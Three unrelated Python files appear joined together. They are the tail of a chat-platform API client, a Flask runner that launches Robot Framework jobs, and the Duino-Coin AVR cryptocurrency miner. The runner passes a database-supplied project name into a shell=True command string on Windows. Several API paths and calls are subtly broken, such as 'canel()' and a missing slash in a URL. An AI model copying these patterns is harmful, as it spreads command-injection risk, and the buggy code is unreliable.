else: links.append(response.json()["photo"])
data = {
"text": message,
"photos": links
}
if replyMessage: data["quote_message_id"] = replyMessage
if gifId and gifProvider: data["gif_id"] = gifId; data["gif_provider"] = gifProvider
data = json.dumps(data)
response = requests.post(f"{self.api}/topic/{topicId}/message", headers=self.headers, data=data)
if response.status_code != 200: return CheckExceptions(response.json())
else: return Message(response.json()).Message
def create_topic(self, bio: str, name: str, isChannel: bool = False, isPrivate: bool = False):
data = json.dumps({
"channel": isChannel,
"private": isPrivate,
"name": name,
"content": bio
})
response = requests.post(f"{self.api}/topic", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_topic(self, topicId: str, bio: str = None, name: str = None, categoryId: int = 1, mute: bool = False, sound: bool = False):
data = json.dumps({
"category_id": categoryId,
"name": name,
"discription": bio
})
_data = json.dumps({"sound": sound, "mute": mute})
requests.patch(f"{self.api}/topicId/{topicId}/settings", data=_data, headers=self.headers)
response = requests.patch(f"{self.api}/topicId/{topicId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def login(self, email: str):
response = requests.post(f"{self.api}/auth/?username={email}%40gmail.com")
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def delete_message(self, topicId: str, messageId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/message{messageId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def leave_topic(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/subscription", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def join_topic(self, topicId: str):
response = requests.post(f"{self.api}/topic/{topicId}/subscription", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_profile(self, photo: BinaryIO = None, username: str = None, bio: str = None, location: str = None, status: bool = True):
if photo is not None:
multipart = {'photo': (photo.__getattribute__("name"), photo), }
response = requests.post(f"{self.api}/user/me/photo", headers=self.headers, files=multipart)
if response.status_code != 200: CheckExceptions(response.json())
else: link = response.json()["photo"]
data = json.dumps({
"bio": bio,
"location": location,
"name": username,
"online": status,
"photo": link
})
response = requests.patch(f"{self.api}/user/me", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def sign_up(self, username):
data = json.dumps({"username": username})
response = requests.post(f"{self.api}/auth/username", data=data)
if response.status_code != 200: CheckExceptions(response.json())
else: return NewAcc(response.json()).NewAcc
def change_user_role(self, topicId: str, userId: str, role: str):
data = json.dumps({"admin": role})
response = requests.patch(f"{self.api}/topic/{topicId}/member/{userId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_message(self, topicId: str, messageId: str, newText: str):
data = json.dumps({"text": newText})
response = requests.patch(f"{self.api}/topic/{topicId}/message/{messageId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def ban(self, topicId: str, userId: str):
response = requests.post(f"{self.api}/topic/{topicId}/ban{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def report(self, userId: str, reason: str = "From Web"):
data = {"reason": reason}
if reason is None: data["comment"] = "Web"
data = json.dumps(data)
response = requests.post(f"{self.api}/user/{userId}/report", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def report_message(self, topicId: str, messageId: str, reason: str = "From Web"):
data = {"reason": reason}
if reason is None: data["comment"] = "Web"
data = json.dumps(data)
response = requests.post(f"{self.api}/topic/{topicId}/message/{messageId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def unban(self, topicId: str, userId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/ban/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def start_dm(self, userId: str):
response = requests.post(f"{self.api}/dm/user/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def follow(self, topicId: str):
response = requests.post(f"{self.api}/topic/{topicId}/follow", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def unfollow(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/unfollow", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def search_topic(self, text: str):
response = requests.get(f"{self.api}/topic/search/{text}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()).TopicList
def unread(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/unread", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def start_typing_status(self, topicId: str, time: int = 5, status: str = "text", messageId: str = None):
threading.Thread(target=self.send, args=(self._send_typing_status_, (self.headers, topicId, status, ), time)).start()
if messageId: threading.Thread(target=self.send_edit, args=(self._when_typing_, topicId, messageId, )).start()
|
runner.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
公众号: 开源优测
Email: lymking@foxmail.com
"""
import os
import platform
import codecs
import time
import json
import subprocess
from datetime import datetime
from threading import Thread, Timer
import xml.etree.ElementTree as ET
from flask import current_app
from flask_login import current_user
from sqlalchemy import and_
from ..models import AutoTask, AutoProject, User
from .. import db
from ..auto.builder import Builder
from .process import Process
def robot_run(category, id):
app = current_app._get_current_object()
if len(app.config["RESULTS"]) > int(app.config['AUTO_PROCESS_COUNT']):
return json.dumps({"status": "busying", "msg": "任务池已满!!!"})
builder = Builder(category, id)
builder.build()
app.config["RESULTS"].append(app.config["POOL"].apply_async(builder.test_run, (app, current_user.get_id(),)))
# app.config["POOL"].join()
return json.dumps({"status": "success", "msg": "任务启动成功"})
def robot_async_run(category, id):
app = current_app._get_current_object()
builder = Builder(category, id)
builder.build()
thr = Thread(target=builder.test_run, args=[app, current_user.get_id()])
#app.config["RESULTS"].append(thr)
thr.start()
return json.dumps({"status": "success", "msg": "任务启动成功"})
def check_process_status(app):
print("timer to check ....%d" % len(app.config["RUNNERS"]))
with app.app_context():
try:
for runner in app.config["RUNNERS"]:
if runner.is_finish():
runner.write_result()
app.config["RUNNERS"].remove(runner)
except Exception as e:
print(e)
def debug_run(id):
builder = Builder(id)
builder.build()
runner = Runner(builder.id, builder.build_no)
runner.debug()
return (builder.id, builder.build_no)
def run_process(category, id):
builder = Builder(id)
builder.build()
runner = Runner(builder.id, builder.build_no)
if category == "auto":
runner.auto_run()
else:
runner.run()
app = current_app._get_current_object()
app.config["TRIGGER"].update_job(id)
app.config["RUNNERS"].append({
"project_id": builder.id,
"task_id": builder.build_no,
"runner": runner
})
"""
for r in app.config["RUNNERS"]:
print("get running logs: %s %s" % (r["project_id"], r["task_id"]))
p = r["runner"]
while p._process.poll() is None:
line = p._process.stdout.readline()
line = line.strip()
if line:
print('Subprogram output: [{}]'.format(line.decode()))
if p._process.returncode == 0:
print('Subprogram success')
else:
print('Subprogram failed')
"""
return json.dumps({"status": "success", "msg": "任务启动成功"})
class Runner:
def __init__(self, project_id, build_no):
self.project_id = project_id
self.build_no = build_no
self._process = None
self._timer = None
self._out_fd = None
def auto_run(self):
try:
user_id = User.query.filter_by(username="AutoExecutor").first().id
name = AutoProject.query.filter_by(id=self.project_id).first().name
task = AutoTask(project_id=self.project_id,
build_no=self.build_no,
status="running",
create_author_id=user_id,
create_timestamp=datetime.now())
db.session.add(task)
db.session.commit()
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
# -x result/output.xml -l result/log.html -r result/report.html
shell = False
if "Windows" in platform.platform():
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "cp936")
command = "pybot -d %s -L DEBUG -N %s %s/testcase.robot" % (output_dir, name, output_dir)
shell = True
else:
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "utf-8")
command = ["pybot", "-d", "%s" % output_dir, "-L", "DEBUG", "-N", "%s" % name, "%s/testcase.robot" % output_dir]
#print(command)
self._process = subprocess.Popen(command, shell=shell, stdout=self._out_fd, stderr=subprocess.STDOUT)
#self._process = Process(command)
#self._process.start()
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def run(self):
#
try:
name = AutoProject.query.filter_by(id=self.project_id).first().name
task = AutoTask(project_id=self.project_id,
build_no=self.build_no,
status="running",
create_author_id=current_user.get_id(),
create_timestamp=datetime.now())
db.session.add(task)
db.session.commit()
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
shell = False
if "Windows" in platform.platform():
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "cp936")
command = "pybot -d %s -L DEBUG -N %s %s/testcase.robot" % (output_dir, name, output_dir)
shell = True
else:
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "utf-8")
command = ["pybot", "-d", "%s" % output_dir, "-L", "DEBUG", "-N", "%s" % name,
"%s/testcase.robot" % output_dir]
# print(command)
self._process = subprocess.Popen(command, shell=shell, stdout=self._out_fd, stderr=subprocess.STDOUT)
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def debug(self):
try:
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
# -x result/output.xml -l result/log.html -r result/report.html
command = ["pybot", "-d", "%s" % output_dir, "--dryrun", "-N", "调试输出", "%s/testcase.robot" % output_dir]
self._out_fd = open(output_dir + "/debug.log", "a+")
self._process = subprocess.Popen(command, shell=False, stdout=self._out_fd, stderr=subprocess.STDOUT)
while True:
if self._process.poll() == 0: # 判断子进程是否结束
break
else:
time.sleep(0.2)
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def stop(self):
status = "success"
msg = "任务终止"
try:
self._process.stop()
msg += "成功"
except Exception as e:
status = "fail"
msg = msg + "异常" + str(e)
return {"status": status,
"msg": msg,
"project_id": self.project_id,
"build_no": self.build_no}
def get_output(self, wait_until_finished=False):
return self._process.get_output(wait_until_finished)
def is_finish(self):
return self._process.is_finished()
def write_result(self):
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
print("write ... result ...")
print(os.path.exists(output_dir + "/log.html"))
if os.path.exists(output_dir + "/log.html"):
time.sleep(0.2)
task = AutoTask.query.filter(and_(AutoTask.project_id == self.project_id,
AutoTask.build_no == self.build_no)).first()
tree = ET.parse(output_dir + "/output.xml")
root = tree.getroot()
passed = root.find("./statistics/suite/stat").attrib["pass"]
fail = root.find("./statistics/suite/stat").attrib["fail"]
if int(fail) != 0:
task.status = 'fail'
else:
task.status = 'pass'
db.session.merge(task)
db.session.commit()
self._timer.canel()
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.5.7)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
from random import choice
import select
import pip
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.57' # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2811,
2812,
2813,
2814,
2815,
2816,
2817
]
SOC_TIMEOUT = 45
PERIODIC_REPORT_TIME = 60
AVR_TIMEOUT = 3.1 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + '/langs.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + '/Miner_config.cfg')
lang = config['Duino-Coin-AVR-Miner']['language']
except Exception:
# If it fails, fallback to english
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
# Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return 'String not found: ' + string_name
def get_prefix(diff: int):
if int(diff) >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif int(diff) >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif int(diff) >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
def debug_output(text: str):
# Debug output
if debug == 'y':
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ 'DEBUG: '
+ str(text))
def title(title: str):
# Window title
if osname == 'nt':
# Windows systems
ossystem('title ' + title)
else:
# Most standard terminals
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
pretty_print("net0",
" "
+ get_string("connection_search")
+ "...",
"warning")
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(100).decode()
except:
continue
if server_version == b'':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(100)
ready_connections[0].settimeout(SOC_TIMEOUT)
return ready_connections[0].getpeername()[1]
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
'sys0',
get_string('sigint_detected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('goodbye'),
'warning')
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
global AVR_TIMEOUT
global PERIODIC_REPORT_TIME
# Initial configuration section
if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
print(
Style.BRIGHT
+ get_string('basic_config_tool')
+ RESOURCES_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL
+ get_string('dont_have_account')
+ Fore.YELLOW
+ get_string('wallet')
+ Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ ' '
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET
+ Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL
+ Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter donation_level is correct
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config['Duino-Coin-AVR-Miner'] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 3.1,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"
}
# Write data to file
with open(str(RESOURCES_DIR)
+ '/Miner_config.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
username = config['Duino-Coin-AVR-Miner']['username']
avrport = config['Duino-Coin-AVR-Miner']['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = config['Duino-Coin-AVR-Miner']['donate']
debug = config['Duino-Coin-AVR-Miner']['debug']
rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
SOC_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["soc_timeout"])
AVR_TIMEOUT = float(config["Duino-Coin-AVR-Miner"]["avr_timeout"])
discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
shuffle_ports = config["Duino-Coin-AVR-Miner"]["shuffle_ports"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-AVR-Miner"]["periodic_report"])
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string('banner')
+ Style.RESET_ALL
+ Fore.MAGENTA
+ ' (v'
+ str(MINER_VER)
+ ') '
+ Fore.RESET
+ '2019-2021')
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('avr_on_port')
+ Style.BRIGHT
+ Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('donation_level')
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('algorithm')
+ Style.BRIGHT
+ Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('rig_identifier')
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ', '
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output('Discord rich presence initialized')
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details='Hashrate: ' + str(round(hashrate)) + ' H/s',
start=startTime,
state='Acc. shares: '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1]),
large_image='ducol',
large_text='Duino-Coin, '
+ 'a coin that can be mined with almost everything, '
+ 'including AVR boards',
buttons=[
{'label': 'Learn more',
'url': 'https://duinocoin.com'},
{'label': 'Discord Server',
'url': 'https://discord.gg/k48Ht5y'}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO 'standard'
# Usb/net/sys background
if message_type.startswith('net'):
background = Back.BLUE
elif message_type.startswith('usb'):
background = Back.MAGENTA
else:
background = Back.GREEN
# Text color
if state == 'success':
color = Fore.GREEN
elif state == 'warning':
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ background
+ ' '
+ message_type
+ ' '
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com, threadid):
global hashrate
if shuffle_ports == "y":
debug_output(
'Searching for fastest connection to the server')
NODE_PORT = get_fastest_connection(str(NODE_ADDRESS))
debug_output('Fastest connection found')
else:
NODE_PORT = AVAILABLE_PORTS[0]
start_time = time()
report_shares = 0
while True:
try:
while True:
try:
# Default AVR mining port
debug_output('Connecting to ' +
str(NODE_ADDRESS + ":" + str(NODE_PORT)))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if threadid == 0:
if float(server_version) <= float(MINER_VER):
pretty_print(
'net0',
get_string('connected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('connected_server')
+ str(server_version)
+ ")",
'success')
else:
pretty_print(
'sys0',
' Miner is outdated (v'
+ MINER_VER
+ ') -'
+ get_string('server_is_on_version')
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ get_string('update_warning'),
'warning')
sleep(10)
soc.send(bytes("MOTD", encoding="ascii"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(10)
pretty_print(
'sys'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_start')
+ Style.NORMAL
+ Fore.RESET
+ get_string('mining_algorithm')
+ str(com)
+ ')',
'success')
while True:
# Send job request
debug_output(com + ': requested job from the server')
soc.sendall(
bytes(
'JOB,'
+ str(username)
+ ',AVR',
encoding='ascii'))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(''.join(filter(str.isdigit, com)))
+ "Correct job received")
except:
pretty_print("usb"
+ str(''.join(filter(str.isdigit, com))),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
while True:
try:
ser.close()
except:
pass
try:
ser = Serial(com,
baudrate=int(BAUDRATE),
timeout=float(AVR_TIMEOUT))
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ ' (port connection err: '
+ str(e)
+ ')',
'error')
sleep(10)
while True:
retry_counter = 0
while True:
if retry_counter >= 3:
break
try:
debug_output(com + ': sending job to AVR')
ser.write(
bytes(
str(
job[0]
+ ',' + job[1]
+ ',' + job[2]
+ ','), encoding='ascii'))
debug_output(com + ': reading result from AVR')
result = ser.read_until(b'\n').decode().strip()
ser.flush()
if "\x00" in result or not result:
raise Exception("Empty data received")
debug_output(com + ': retrieved result: '
+ str(result)
+ ' len: '
+ str(len(result)))
result = result.split(',')
try:
if result[0] and result[1]:
break
except Exception as e:
debug_output(
com
+ ': retrying reading data: '
+ str(e))
retry_counter += 1
except Exception as e:
debug_output(
com
+ ': retrying sending data: '
+ str(e))
retry_counter += 1
try:
debug_output(
com
+ ': received result ('
+ str(result[0])
+ ')')
debug_output(
com
+ ': received time ('
+ str(result[1])
+ ')')
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
if computetime < 1:
computetime = str(
int(computetime * 1000)) + "ms"
else:
computetime = str(round(computetime, 2)) + "s"
# Calculate hashrate
hashrate_t = round(
int(result[0]) * 1000000 / int(result[1]), 2)
hashrate_mean.append(hashrate_t)
# Get average from the last hashrate measurements
hashrate = mean(hashrate_mean[-5:])
debug_output(
com +
': calculated hashrate (' +
str(hashrate_t) + ')'
+ ' (avg:' + str(hashrate) + ')')
try:
chipID = result[2]
debug_output(
com + ': chip ID: ' + str(result[2]))
""" Check if chipID got received, this is
of course just a fraction of what's
happening on the server with it """
if not chipID.startswith('DUCOID'):
raise Exception('Wrong chipID string')
except Exception:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
' Possible incorrect chip ID!'
+ Style.NORMAL
+ Fore.RESET
+ ' This can cause problems with the'
+ ' Kolka system',
'warning')
chipID = 'None'
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_avr_connection_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (error reading result from the board: '
+ str(e)
+ ', please check connection '
+ 'and port setting)',
'warning')
debug_output(
com + ': error splitting data: ' + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(result[0])
+ ','
+ str(hashrate_t)
+ ',Official AVR Miner (DUCO-S1A) v'
+ str(MINER_VER)
+ ','
+ str(rig_identifier)
+ ','
+ str(chipID),
encoding='ascii'))
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output(com + ': connection error: ' + str(e))
sleep(5)
break
while True:
try:
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip('\n')
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
debug_output(com + ': feedback: '
+ str(feedback)
+ ' with ping: '
+ str(ping))
break
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (err parsing response: '
+ str(e)
+ ')',
'error')
debug_output(com + ': error parsing response: '
+ str(e))
sleep(5)
break
